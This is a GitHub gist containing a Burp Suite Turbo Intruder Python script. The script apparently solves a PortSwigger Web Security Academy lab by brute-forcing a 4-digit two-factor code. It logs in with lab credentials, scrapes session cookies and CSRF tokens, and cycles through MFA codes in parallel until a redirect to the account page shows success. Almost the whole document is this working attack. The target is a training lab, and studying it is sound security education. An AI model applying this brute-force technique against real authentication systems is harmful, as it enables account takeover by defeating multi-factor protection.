Created
August 17, 2023 15:26
-
-
Save rkhan99e/783d34ab6cdd24f7caa91f5f01b295e9 to your computer and use it in GitHub Desktop.
Burpsuite - Turbo Intruder Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import re | |
import time | |
# Parameters to configure | |
re_csrf = 'name="csrf" value="([\w\d]+)"' | |
re_session = 'session=([\w\d]+)' | |
url='https://0add0030040299378166d901002800a1.web-security-academy.net' | |
delay=1 #sec | |
max_concurrent=5 | |
max_thread=10 | |
req_count=20 | |
def queueRequests(target, wordlists): | |
global engine | |
# Set one request per one connection to avoid violations of the execution logic; | |
# the number of connections depends on the app's capacity. | |
# All these values have to be calibrated for different servers. | |
# The task server doesn't endure high loads well; so, five parallel connections will be enough | |
engine = RequestEngine(endpoint=url, | |
concurrentConnections=max_concurrent, | |
requestsPerConnection=max_thread) | |
# Send initial requests that will trigger subsequent requests. | |
# Set a 1-second delay to that the threads aren't executed synchronically but alternate. | |
for x in xrange(1,req_count): | |
print ('1. GET /login Request') | |
engine.queue(target.req, '') | |
# time.sleep(delay) | |
def handleResponse(req, interesting): | |
global engine | |
global iterable | |
#table.add(req) | |
if 'HTTP/1.1 302 Found' in req.response and 'Location: /my-account?id=wiener' in req.response: | |
# If you get this header in the response, when you have won! | |
match_session = re.search(re_session, req.response) | |
req = '''GET /my-account?id=wiener HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n''' | |
print ('4. GET /my-account?id=wiener Request') | |
engine.queue(req, match_session.group(1)) | |
return None | |
if 'Incorrect security code' in req.response: | |
# If the response says that the entered code is incorrect, it means that one attempt was used, and you launch a new iteration of requests. | |
table.add(req) | |
print ('1. GET /login Request') | |
engine.queue(target.req,'') | |
return None | |
if 'Please enter your 4-digit security code' in req.response: | |
# If the response prompts you to enter OTP, send a request with an attempt to enter OTP. | |
match_csrf = re.search(re_csrf, req.response) | |
match_session = re.search(re_session, req.getRequest()) | |
req = '''POST /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 51\r\n\r\ncsrf=%s&mfa-code=%s''' | |
print '4. POST /login2 Request' | |
engine.queue(req, [match_session.group(1),match_csrf.group(1),str(iterable).zfill(4)]) | |
iterable += 1 | |
print 'Iterable: ' + str(iterable) | |
return None | |
if 'Location: /login2' in req.response: | |
# If the response says that you have been redirected to the /login2 page, it means that you have previously entered the correct credentials; now you receive a new session ID and go to the page where you will retrieve CSRF required for a request with OTP. | |
match_session = re.search(re_session, req.response) | |
req = '''GET /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n''' | |
print '3. GET /login2 Request' | |
engine.queue(req, match_session.group(1)) | |
return None | |
if '<form class=login-form method=POST action="/login">' in req.response: | |
# If the first request was executed successfully, you find yourself on the page prompting to enter the login and password. Enter the requested login and password. | |
match_session = re.search(re_session, req.response) | |
match_csrf = re.search(re_csrf, req.response) | |
req = '''POST /login HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 70\r\n\r\ncsrf=%s&username=wiener&password=peter''' | |
print ('2. POST /login Request') | |
engine.queue(req, [match_session.group(1),match_csrf.group(1)]) | |
return None | |
if 'HTTP/1.1 200 OK' in req.response and 'Store credit: $100.00' in req.response: | |
# If you get this header in the response, when you have won! | |
table.add(req) | |
print ('Win') | |
return None | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I give all credit to the following https://hackmag.com/security/burp-stepper-intruder/